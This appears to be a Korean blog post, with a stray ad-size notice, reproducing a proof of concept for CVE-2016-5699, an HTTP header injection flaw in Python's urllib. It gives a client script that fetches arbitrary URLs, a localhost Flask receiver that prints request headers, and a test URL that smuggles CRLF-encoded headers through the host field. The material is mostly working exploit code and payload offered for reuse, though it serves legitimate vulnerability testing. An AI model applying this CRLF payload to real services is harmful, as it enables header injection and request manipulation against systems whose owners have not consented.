336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.
참고 : https://github.com/bunseokbot/CVE-2016-5699-poc
import urllib.request import traceback print("#######################################") print("Testing HTTP Header injection in Python") print("Origin : http://blog.blindspotsecurity.com/2016/06/advisory-http-header-injection-in.html") print("bunseokbot@UpRoot") print("#######################################") while True: try: url = input("URL : ") info = urllib.request.urlopen(url).info() print(info) except KeyboardInterrupt as kie: print("KeyboardInterrupt event found!\nTerminating Program..") break except Exception as e: print(traceback.format_exc())
receiver.py
from flask import Flask, request app = Flask(__name__) app.debug = True @app.route("/vulntest") def vulntest(): print("###############################################") print("Request Header") print("###############################################") print(request.headers) print("###############################################") return '' if __name__ == "__main__": app.run(port=12345, threaded=True) # localhost only
TEST URL : http://127.0.0.1%0d%0aInjection-success:%20success%0d%0adummy:%20:12345/vulntest